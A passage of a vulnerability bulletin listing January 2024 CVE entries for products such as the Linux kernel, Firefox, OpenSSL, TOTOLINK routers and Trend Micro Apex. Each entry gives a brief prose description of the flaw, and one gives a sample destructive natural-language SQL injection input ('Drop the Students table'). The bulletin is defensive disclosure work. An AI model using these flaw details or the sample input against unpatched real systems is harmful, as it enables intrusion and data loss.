In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c. 2024-01-23 not yet calculated CVE-2024-23848
cve@mitre.org
linux — kernel
 
In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access. 2024-01-23 not yet calculated CVE-2024-23849
cve@mitre.org
cve@mitre.org
linux — kernel
 
In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation. 2024-01-23 not yet calculated CVE-2024-23850
cve@mitre.org
cve@mitre.org
linux — kernel
 
copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl. 2024-01-23 not yet calculated CVE-2024-23851
cve@mitre.org
cve@mitre.org
livesite — livesite
 
liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulnerability via the component /livesite/edit_designer_region.php. 2024-01-25 not yet calculated CVE-2024-22638
cve@mitre.org
llamaHub — llamahub
 
The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML. 2024-01-21 not yet calculated CVE-2024-23730
cve@mitre.org
cve@mitre.org
cve@mitre.org
llamaindex — llamaindex
 
LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year’s student records via “Drop the Students table” within English language input. 2024-01-22 not yet calculated CVE-2024-23751
cve@mitre.org
luxe_beauty_clinic — mini-app_line
 
An issue in Luxe Beauty Clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48126
cve@mitre.org
mathtex — mathtex
 
Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component. 2024-01-24 not yet calculated CVE-2023-51885
cve@mitre.org
mathtex — mathtex
 
Buffer Overflow vulnerability in the main() function in Mathtex 1.05 and before allows a remote attacker to cause a denial of service when using convertpath. 2024-01-24 not yet calculated CVE-2023-51886
cve@mitre.org
mathtex — mathtex
 
Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL. 2024-01-24 not yet calculated CVE-2023-51887
cve@mitre.org
mathtex — mathtex
 
Buffer Overflow vulnerability in the nomath() function in Mathtex v.1.05 and before allows a remote attacker to cause a denial of service via a crafted string in the application URL. 2024-01-24 not yet calculated CVE-2023-51888
cve@mitre.org
mathtex — mathtex
 
Stack Overflow vulnerability in the validate() function in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in the application URL. 2024-01-24 not yet calculated CVE-2023-51889
cve@mitre.org
mathtex — mathtex
 
An infinite loop issue discovered in Mathtex 1.05 and before allows a remote attacker to consume CPU resources via crafted string in the application URL. 2024-01-24 not yet calculated CVE-2023-51890
cve@mitre.org
mathtex — mathtex
 
An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allow attackers to run arbitrary commands via the sub_415C80 function. 2024-01-24 not yet calculated CVE-2023-52038
cve@mitre.org
mbed — tls
 
An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum. 2024-01-21 not yet calculated CVE-2023-52353
cve@mitre.org
mbed — tls
 
An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions. 2024-01-21 not yet calculated CVE-2024-23744
cve@mitre.org
mercari,_inc. — “mercari”_app_for_android
 
Improper authorization in handler for custom URL scheme issue in “Mercari” App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack. 2024-01-26 not yet calculated CVE-2024-23388
vultures@jpcert.or.jp
meross — msh30q
 
Meross MSH30Q 4.5.23 is vulnerable to Cleartext Transmission of Sensitive Information. During the device setup phase, the MSH30Q creates an unprotected Wi-Fi access point. In this phase, MSH30Q needs to connect to the Internet through a Wi-Fi router. This is why MSH30Q asks for the Wi-Fi network name (SSID) and the Wi-Fi network password. When the user enters the password, the transmission of the Wi-Fi password and name between the MSH30Q and mobile application is observed in the Wi-Fi network. Although the Wi-Fi password is encrypted, a part of the decryption algorithm is public so we complemented the missing parts to decrypt it. 2024-01-23 not yet calculated CVE-2023-46889
cve@mitre.org
meross — msh30q
 
The radio frequency communication protocol being used by Meross MSH30Q 4.5.23 is vulnerable to replay attacks, allowing attackers to record and replay previously captured communication to execute unauthorized commands or actions (e.g., thermostat’s temperature). 2024-01-23 not yet calculated CVE-2023-46892
cve@mitre.org
metagpt — metagpt
 
MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen. 2024-01-22 not yet calculated CVE-2024-23750
cve@mitre.org
mimasaka_farm — mini-app_line
 
An issue in mimasaka_farm mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48135
cve@mitre.org
ministry_of_agriculture_forestry_and_fisheries — electronic_delivery_check_system_ministry_of_agriculture_forestry_and_fisheries_the_agriculture_and_rural_development_project_version_march_heisei_31_era_edition
 
Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. 2024-01-24 not yet calculated CVE-2024-22380
vultures@jpcert.or.jp
vultures@jpcert.or.jp
ministry_of_defense — electronic_deliverables_creation_support_tool_(construction_edition)
 
Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. 2024-01-24 not yet calculated CVE-2024-21796
vultures@jpcert.or.jp
vultures@jpcert.or.jp
ministry_of_land_infrastructure_transport_and_tourism_japan — electronic_delivery_check_system_(doboku)
 
Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. 2024-01-24 not yet calculated CVE-2024-21765
vultures@jpcert.or.jp
vultures@jpcert.or.jp
vultures@jpcert.or.jp
mozilla — firefox
 
An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0741
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0742
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122. 2024-01-23 not yet calculated CVE-2024-0743
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122. 2024-01-23 not yet calculated CVE-2024-0744
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122. 2024-01-23 not yet calculated CVE-2024-0745
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0746
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0747
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122. 2024-01-23 not yet calculated CVE-2024-0748
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0749
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0750
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0751
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122. 2024-01-23 not yet calculated CVE-2024-0752
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0753
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122. 2024-01-23 not yet calculated CVE-2024-0754
security@mozilla.org
security@mozilla.org
mozilla — firefox
 
Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. 2024-01-23 not yet calculated CVE-2024-0755
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — focus_for_ios
 
Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user’s loaded webpage. This vulnerability affects Focus for iOS < 122. 2024-01-22 not yet calculated CVE-2024-0605
security@mozilla.org
security@mozilla.org
mozilla — focus_for_ios
 
An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user’s loaded webpage. This vulnerability affects Focus for iOS < 122. 2024-01-22 not yet calculated CVE-2024-0606
security@mozilla.org
security@mozilla.org
multisigwallet– 0xf0c99
 
MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction. 2024-01-19 not yet calculated CVE-2023-47033
cve@mitre.org
cve@mitre.org
mygakuya– mini-app_line
 
An issue in myGAKUYA mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48127
cve@mitre.org
myq — print_server
 
MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution. 2024-01-23 not yet calculated CVE-2024-22076
cve@mitre.org
cve@mitre.org
nagios — nagios cross-platform_agent_(ncpa)
 
DOM-based Cross Site Scripting (XSS vulnerability in ‘Tail Event Logs’ functionality in Nagios Nagios Cross-Platform Agent (NCPA) before 2.4.0 allows attackers to run arbitrary code via the name element when filtering for a log. 2024-01-24 not yet calculated CVE-2021-43584
cve@mitre.org
netsis_systems — mw5360
 
NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page. 2024-01-25 not yet calculated CVE-2024-22729
cve@mitre.org
opennds — opennds
 
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. 2024-01-26 not yet calculated CVE-2023-38317
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
opennds — opennds
 
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. 2024-01-26 not yet calculated CVE-2023-38318
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
opennds — opennds
 
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the FAS key entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. 2024-01-26 not yet calculated CVE-2023-38319
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
opennds — opennds
 
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. 2024-01-26 not yet calculated CVE-2023-38323
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
openssl — openssl
 
Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. 2024-01-26 not yet calculated CVE-2024-0727
openssl-security@openssl.org
openssl-security@openssl.org
openssl-security@openssl.org
openssl-security@openssl.org
openssl-security@openssl.org
openssl-security@openssl.org
othanc — othanc
 
Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server’s error reporting. 2024-01-24 not yet calculated CVE-2024-22725
cve@mitre.org
cve@mitre.org
paddle — paddle
 
Code Injection in paddlepaddle/paddle 2024-01-20 not yet calculated CVE-2024-0521
security@huntr.dev
pandasai — pandasai
 
GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660. 2024-01-22 not yet calculated CVE-2024-23752
cve@mitre.org
plone — docker_official_image
 
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers. 2024-01-25 not yet calculated CVE-2024-23055
cve@mitre.org
cve@mitre.org
cve@mitre.org
pluXml — pluxml
 
PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field. 2024-01-25 not yet calculated CVE-2024-22636
cve@mitre.org
poco — utf32encoding.cpp
 
UTF32Encoding.cpp in POCO has a Poco::UTF32Encoding integer overflow and resultant stack buffer overflow because Poco::UTF32Encoding::convert() and Poco::UTF32::queryConvert() may return a negative integer if a UTF-32 byte sequence evaluates to a value of 0x80000000 or higher. This is fixed in 1.11.8p2, 1.12.5p2, and 1.13.0. 2024-01-27 not yet calculated CVE-2023-52389
cve@mitre.org
cve@mitre.org
cve@mitre.org
pops! — rebel
 
The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE. 2024-01-20 not yet calculated CVE-2023-46447
cve@mitre.org
cve@mitre.org
cve@mitre.org
processwire — processwire
 
An issue found in Processwire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module. 2024-01-24 not yet calculated CVE-2023-24676
cve@mitre.org
projectworlds — vistor_management_systemin_php
 
An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remote attacker to escalate privileges via a crafted script to the login page in the POST/index.php 2024-01-25 not yet calculated CVE-2024-22922
cve@mitre.org
cve@mitre.org
cve@mitre.org
provectus — kafka-ui
 
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. 2024-01-25 not yet calculated CVE-2023-52251
cve@mitre.org
quest_analytics_llc — iqcrm
 
SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page. 2024-01-22 not yet calculated CVE-2023-48118
cve@mitre.org
cve@mitre.org
cve@mitre.org
redis — raft_master
 
Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c. 2024-01-23 not yet calculated CVE-2023-31654
cve@mitre.org
cve@mitre.org
regify — regipay_ client
 
An issue was discovered in Regify Regipay Client for Windows version 4.5.1.0 allows DLL hijacking: a user can trigger the execution of arbitrary code every time the product is executed. 2024-01-24 not yet calculated CVE-2023-51711
cve@mitre.org
ros2 — foxy_fitzroy
 
Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. 2024-01-23 not yet calculated CVE-2023-51199
cve@mitre.org
ros2 — foxy_fitzroy
 
An issue in the default configurations of ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows unauthenticated attackers to authenticate using default credentials. 2024-01-23 not yet calculated CVE-2023-51200
cve@mitre.org
ros2 — foxy_fitzroy
 
Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack. 2024-01-23 not yet calculated CVE-2023-51201
cve@mitre.org
ros2 — foxy_fitzroy
 
An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file. 2024-01-23 not yet calculated CVE-2023-51208
cve@mitre.org
rptc — 0x3b08c
 
RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations. 2024-01-19 not yet calculated CVE-2023-47035
cve@mitre.org
cve@mitre.org
shelly — trv_ 20220811-152343
 
Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware. 2024-01-23 not yet calculated CVE-2023-42143
cve@mitre.org
shelly — trv_20220811-152343
 
Cleartext Transmission during initial setup in Shelly TRV 20220811-15234 v.2.1.8 allows a local attacker to obtain the Wi-Fi password. 2024-01-23 not yet calculated CVE-2023-42144
cve@mitre.org
solaxpower — pocket_wifi
 
An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. The device provides a WiFi access point for initial configuration. The WiFi network provided has no network authentication (such as an encryption key) and persists permanently, including after enrollment and setup is complete. The WiFi network serves a web-based configuration utility, as well as an unauthenticated ModBus protocol interface. 2024-01-23 not yet calculated CVE-2023-35835
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
solaxpower — pocket_wifi
 
An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target’s Wi-Fi networks. 2024-01-23 not yet calculated CVE-2023-35836
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
solaxpower — pocket_wifi
 
An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. Authentication for web interface is completed via an unauthenticated WiFi AP. The administrative password for the web interface has a default password, equal to the registration ID of the device. This same registration ID is used as the WiFi SSID name. No routine is in place to force a change to this password on first use or bring its default state to the attention of the user. Once authenticated, an attacker can reconfigure the device or upload new firmware, both of which can lead to Denial of Service, code execution, or Escalation of Privileges. 2024-01-23 not yet calculated CVE-2023-35837
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
splicecom — ipcs
 
A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack. 2024-01-25 not yet calculated CVE-2023-33757
cve@mitre.org
spliceocm — maximiser_soft_pbx
 
Splicecom Maximiser Soft PBX v1.5 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the CLIENT_NAME and DEVICE_GUID fields in the login component. 2024-01-25 not yet calculated CVE-2023-33758
cve@mitre.org
spliceocm — maximiser_soft_pbx
 
SpliceCom Maximiser Soft PBX v1.5 and before does not restrict excessive authentication attempts, allowing attackers to bypass authentication via a brute force attack. 2024-01-25 not yet calculated CVE-2023-33759
cve@mitre.org
spliceocm — maximiser_soft_pbx
 
SpliceCom Maximiser Soft PBX v1.5 and before was discovered to utilize a default SSL certificate. This issue can allow attackers to eavesdrop on communications via a man-in-the-middle attack. 2024-01-25 not yet calculated CVE-2023-33760
cve@mitre.org
spoon_radio_japan_inc. — android_spoon_application
 
Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service. 2024-01-24 not yet calculated CVE-2024-23453
vultures@jpcert.or.jp
vultures@jpcert.or.jp
vultures@jpcert.or.jp
sunlight — sunlightcms
 
Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component. 2024-01-27 not yet calculated CVE-2023-48201
cve@mitre.org
sunlight — sunlightcms
 
Cross-Site Scripting (XSS) vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate privileges via a crafted SVG file in the File Manager component. 2024-01-27 not yet calculated CVE-2023-48202
cve@mitre.org
totolink — a3700r
 
TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules 2024-01-23 not yet calculated CVE-2024-22662
cve@mitre.org
totolink — a3700r
 
TOTOLINK_A3700R_V9.1.2u.6165_20211012has a command Injection vulnerability via setOpModeCfg 2024-01-23 not yet calculated CVE-2024-22663
cve@mitre.org
totolink — x2000r
 
TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa. 2024-01-25 not yet calculated CVE-2024-22529
cve@mitre.org
totolink — x6000r
 
An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415AA4 function. 2024-01-24 not yet calculated CVE-2023-52039
cve@mitre.org
totolink — x6000r
 
An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function. 2024-01-24 not yet calculated CVE-2023-52040
cve@mitre.org
totolink — a3700r
 
TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg 2024-01-23 not yet calculated CVE-2024-22660
cve@mitre.org
treandnet –tew-824dru
 
TRENDnet TEW-824DRU version 1.04b01 is vulnerable to Command Injection via the system.ntp.server in the sub_420AE0() function. 2024-01-26 not yet calculated CVE-2024-22545
cve@mitre.org
treandnet –tew-824dru
 
An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file. 2024-01-26 not yet calculated CVE-2024-22550
cve@mitre.org
trend_micro_inc. — trend_micro_apex_one
 
An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52091
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52092
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An exposed dangerous function vulnerability in the Trend Micro Apex One agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52093
security@trendmicro.com
security@trendmicro.com
trend_micro,_inc. — trend_micro_apex_one
 
An updater link following vulnerability in the Trend Micro Apex One agent could allow a local attacker to abuse the updater to delete an arbitrary folder, leading for a local privilege escalation on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52094
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central An unrestricted file upload vulnerability in Trend Micro Apex Central could allow a remote attacker to create arbitrary files on affected installations. Please note: although authentication is required to exploit this vulnerability, this vulnerability could be exploited when the attacker has any valid set of credentials. Also, this vulnerability could be potentially used in combination with another vulnerability to execute arbitrary code. 2024-01-23 not yet calculated CVE-2023-52324
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38625 through CVE-2023-38627. 2024-01-23 not yet calculated CVE-2023-38624
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38624. 2024-01-23 not yet calculated CVE-2023-38625
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38625. 2024-01-23 not yet calculated CVE-2023-38626
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38626. 2024-01-23 not yet calculated CVE-2023-38627
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A local file inclusion vulnerability in one of Trend Micro Apex Central’s widgets could allow a remote attacker to execute arbitrary code on affected installations. Please note: this vulnerability must be used in conjunction with another one to exploit an affected system. In addition, an attacker must first obtain a valid set of credentials on target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52325
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52327. 2024-01-23 not yet calculated CVE-2023-52326
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52328. 2024-01-23 not yet calculated CVE-2023-52327
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52329. 2024-01-23 not yet calculated CVE-2023-52328
security@trendmicro.com
security@trendmicro.com
